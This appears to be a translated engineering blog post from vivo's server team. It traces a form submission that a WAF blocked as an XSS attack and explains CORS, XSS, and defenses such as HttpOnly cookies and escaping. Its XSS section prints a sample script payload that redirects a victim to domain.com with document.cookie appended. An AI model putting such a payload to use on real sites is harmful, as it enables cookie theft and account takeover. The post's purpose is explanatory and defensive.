Layer by layer analysis of an HTTP POST request accident

vivo Internet Server Team - Wei Ling

This article mainly describes how to lock and solve the reason why normal requests are misjudged as cross-domain according to the company's network architecture and business characteristics.

1. Problem description

A certain business background reports a cross-domain error when the form is submitted, as shown in the following figure:

As can be seen from the figure, the reason for the error is that the HTTP request failed to be sent. Therefore, it is necessary to first understand what the complete link of the HTTP request is.

HTTP requests generally go through three levels, namely DNS, Nginx, and Web server. The specific process is as follows:

The browser sends a request to the local operator's DNS server first, and obtains the requested IP address through domain name resolution
After the browser obtains the IP address, it sends an HTTP request to Nginx, which is reverse proxyed by Nginx to the web server
Finally, the corresponding resources are returned by the web server

After understanding the basic HTTP request link, combined with the problem, a preliminary investigation was conducted, and it was found that this form was a post submission in application/json format. At the same time, this business system adopts an architecture that separates the front and back ends (the page domain name and the background service domain name are different), and a cross-domain solution has been configured in Nginx. Based on this, we conduct an analysis.

2. Troubleshooting steps

Step 1: Self-determination

Since it is a form form, we use the control variable method to try to modify each field and submit the test. After many trials, changes to the moduleExport field in the locked form caused the problem .

Considering that the moduleExport field is a piece of JS code in business, we tried to delete/modify this JS code and found that when the JS code in the field moduleExport is small enough, the problem disappears.

Based on the above findings, our first guess is whether the HTTP responder's request body size limit is causing this problem.

Step 2: Check HTTP request body restrictions

Due to the separation of front and back ends, the real request is responded by the service represented by the intranet domain name XXX.XXX.XXX. The response chain of the intranet domain name is as follows:

Then in theory, if it is the limitation of the HTTP request body, it may occur at the LVS layer or the Nginx layer or Tomcat. Let's check step by step:

First check the LVS layer. If the LVS layer fails, the gateway exception will occur, and the return code will be 502. Therefore, by capturing the packet to check the return code, it can be seen from the figure below that the return code is 418, so the possibility of LVS abnormality is ruled out.

Next, check the Nginx layer. The HTTP configuration of the Nginx layer is as follows:

We see that at the Nginx layer, the maximum supported HTTP request body is 50m, and the form request form of our accident is about 2M, which is much smaller than the limit. Therefore, it is not caused by the limitation of the HTTP request body of the Nginx layer .

Then check the Tomcat layer and view the Tomcat configuration:

We found that the size limit of Tomcat for the maximum post request is -1, which is semantically expressed as unlimited, so: it is not caused by the limit of the HTTP request body of the Tomcat layer.

To sum up, we can think that this problem has nothing to do with the size limit of the HTTP request body.

So the question is, if it is not caused by these two layers, is there another factor or other network layer caused?

Step 3: Brainstorm

We pulled the relevant operation and maintenance parties into a group for discussion, and the discussion was divided into two stages

【The first stage】

The operation and maintenance students found that Tomcat is deployed using containers, and between the container and nginx layer, there is a nameserver layer that comes with the container - ingress. After we checked the relevant configuration of ingress, we found that the size limit of the HTTP request body is 3072m. Exclusion is the reason for ingress.

【second stage】

The security classmate said that in order to prevent XSS attacks, the company will perform XSS attack verification for all background requests. If the verification fails, a cross-domain error will be reported.

That is to say, the theoretically complete network layer call chain is as follows:

And from the working mechanism of WAF and the appearance of the problem, it is likely to be the cause of the WAF layer .

Step 4: WAF troubleshooting

With the above guesses, we re-captured the packet and tried to obtain the optrace path of the entire HTTP request to see if it was intercepted at the WAF layer. The packet capture results are as follows:

From the packet capture data, if the status is complete, the front-end request is sent successfully, the return code is 418, and the ip address in optrace is queried as the WAF server ip address .

In summary, the change of the moduleExport field in the form form is likely to lead to interception at the WAF layer . The content of the moduleExport field in question is as follows:

 module.exports = {
    "labelWidth": 80,
    "schema": {
        "title": "XXX",
        "type": "array",
        "items":{
            "type":"object",
            "required":["key","value"],
            "properties":{
                "conf":{
                    "title":"XXX",
                    "type":"string"
                },
                "configs":{
                    "title":"XXX",
                    "type":"array",
                    "items":{
                        ......
                            config: {
                                ......
                                validator: function(value, callback) {
                                    // 至少填写一项
                                    if(!value || !Object.keys(value).length) {
                                        return callback(new Error('至少填写一项'))
                                    }
 
                                   callback()
                               }
                         }
              ......
      }

After we conduct field-by-field investigation, locking the module.exports.items.properties.configs.config.validator field will trigger the WAF interception mechanism: when the request packet passes through the WAF module, all attack rules will be matched. risk rules, trigger the interception action.

3. Problem Analysis

The cause of the entire failure is that the content of the service request triggers the WAF's XSS attack detection. Then here comes the problem

Why do you need WAF
What is an XSS attack

Before explaining XSS, we must first clarify the browser's cross-domain protection mechanism

3.1 Cross-domain protection mechanism

Modern browsers all have a 'same-origin policy'. The so-called same-origin policy refers to only the address of:

Protocol name HTTPS, HTTP
domain name
port name

Only if they are the same, are they allowed to access the same cookie, localStorage, or send Ajax requests, etc. If it is accessed from different origins, it is called cross-domain. In daily development, there are reasonable cross-domain requirements. For example, in the system corresponding to this problem, due to the separation of front and back ends, the domain name of the page and the domain name of the background must be different. So how to reasonably cross-domain becomes a problem.

Common cross-domain solutions are: IFRAME, JSONP, CORS .

IFRAME is to generate an IFRAME inside the page, and dynamically write JS inside the IFRAME for submission. There are early EXT frameworks and so on that use this technology.
JSONP serializes the request into a string, and then initiates a JS request with the string. This practice requires background support and can only be used with GET requests. This scheme has been abolished in the current industry.
The CORS protocol is widely used, and the system in this accident uses CORS to separate the front and back ends. So, what is the CORS protocol?

3.2 CORS Protocol

CORS (Cross-Origin Resource Sharing) cross-origin resource sharing is a W3C standard (official document) that solves the cross-domain restriction of browsers. The core idea is to set the corresponding fields in the HTTP request header. After the relevant fields are set, the request will be initiated normally, and the background will check these fields to determine whether the request is a reasonable cross-domain request.

The CORS protocol requires the support of the server (non-server business process), such as Tomcat 7 and its later versions, etc.

For developers, CORS communication is no different from AJAX communication of the same origin, and the code is exactly the same. Once the browser finds that the AJAX request is cross-origin, it will automatically add some additional header information, and sometimes an additional request will be made, but the user will not feel it.

Therefore, the key to implementing CORS communication is the server (the server side can determine which domains can be requested). Cross-origin communication is possible as long as the server implements the CORS protocol.

Although CORS solves the cross-domain problem, it introduces risks, such as XSS attacks, so a layer of Web Application Firewall (WAF) needs to be added before reaching the server. Its function is to filter all requests. When the request is found to be cross-domain, The entire request message will be matched with rules. If the rules are found to be unmatched, an error will be reported and returned (similar to 418 in this case).

The overall process is as follows:

Unreasonable cross-domain requests are generally regarded as aggressive requests, and we regard this type of requests as XSS attacks. So what is an XSS attack in a broad sense?

3.3 XSS attack mechanism

XSS is an acronym for Cross-Site Scripting, which can inject code, including HTML and JavaScript, into web pages that users browse.

For example there is a forum site where an attacker could post the following:

 <script>location.href="//domain.com/?c=" + document.cookiescript>

This content may then be rendered as:

 <p><script>location.href="//domain.com/?c=" + document.cookie</script></p>

Another user viewing a page with this content will jump to domain.com with the current scope cookie. If this forum website manages the user's login status through cookies, the attacker can log in to the victim's account through this cookie.

XSS can steal users' cookies by forging fake input forms to defraud personal information, display fake articles or pictures, etc. After stealing cookies, users can impersonate users to access various systems, which is extremely harmful.

Two XSS defense mechanisms are given below.

3.4 XSS defense mechanism

The XSS defense mechanism mainly includes the following two points:

3.4.1 Set Cookie as HTTPOnly

Cookie with HTTPOnly is set to prevent the invocation of JavaScript script, so the user's cookie information cannot be obtained through document.cookie.

3.4.2 Filter special characters

For example, escape < to < and \> to > to avoid running HTML and Javascript code.

Rich text editors allow users to enter HTML code, so it is not possible to simply filter characters such as <, which greatly increases the possibility of XSS attacks.

Rich text editors usually use XSS filters to prevent XSS attacks. By defining some tag whitelists or blacklists, the input of aggressive HTML codes is not allowed.

In the following example, tags such as form and script are escaped, while tags such as h and p are preserved.

 <h1 id="title">XSS Demo</h1>
 
<p>123</p>
 
<form>
  <input type="text" name="q" value="test">
</form>
 
<pre>hello</pre>
 
<script type="text/javascript">
alert(/xss/);
</script>
<h1>XSS Demo</h1>
 
<p>123</p>

After escaping:

 <h1>XSS Demo</h1>
 
<p>123</p>
 
&lt;form&gt;
&lt;input type="text" name="q" value="test"&gt;
&lt;/form&gt;
 
<pre>hello</pre>
 
&lt;script type="text/javascript"&gt;
alert(/xss/);
&lt;/script&gt;

Fourth, problem solving

After identifying the problem and having the security team modify the WAF's blocking rules, the problem disappeared.

Finally, this issue is summarized.

V. Summary of the problem

Looking at the entire troubleshooting process, the most resource-intensive work focuses on problem location: which module is the problem. The biggest difficulty of the positioning module lies in the lack of understanding of the entire network link (the existence of the WAF layer was not known before).

So, for similar problems, how should we speed up the solution of the problem? I think there are two things to note:

The control variable method is used to precisely locate the boundary of the problem - when it can occur and when it cannot occur.
Be familiar with the existence of each module, as well as the responsibility boundaries and risks of each module.

Let's explain one by one:

5.1 Determining problem boundaries

At the beginning, after we determined that the problem was caused by the form form, we modified and verified the fields one by one, and finally determined the phenomenon caused by one of the fields. After locating the specific problem, the previously locked fields are disassembled, and each attribute in the field is gradually analyzed, so as to finally determine that the value of the XX attribute violates the WAF rule mechanism.

5.2 Positioning module error

In this case, the fault of cross-domain rejection is mainly at the network layer, so we must understand the network hierarchy of the entire business service. Then analyze the situation of each layer.

At the Nginx layer, we analyze the configuration file
At the ingress layer, we analyze the configuration rules in it
At the Tomcat layer, we analyze the properties of server.xml

In conclusion, we must be familiar with the responsibilities of each module and know how to judge whether each module is working properly in the entire link. Only based on this, we can gradually narrow down the scope of the problem and finally get the answer.

Layer by layer analysis of an HTTP POST request accident

1. Problem description

2. Troubleshooting steps

3. Problem Analysis

3.1 Cross-domain protection mechanism

3.2 CORS Protocol

3.3 XSS attack mechanism

3.4 XSS defense mechanism

3.4.1 Set Cookie as HTTPOnly

3.4.2 Filter special characters

Fourth, problem solving

V. Summary of the problem

5.1 Determining problem boundaries

5.2 Positioning module error

vivo互联网技术

引用和评论

vivo 官网 APP 首页端智能业务实践

腾讯 tRPC-Go 教学——（5）filter、context 和日志组件

腾讯 tRPC-Go 教学——（1）搭建服务

@tanstack/react-query 实践

腾讯 tRPC-Go 教学——（2）trpc HTTP 能力

腾讯 tRPC-Go 教学——（4）tRPC 组件生态和使用

腾讯 tRPC-Go 教学——（3）微服务间调用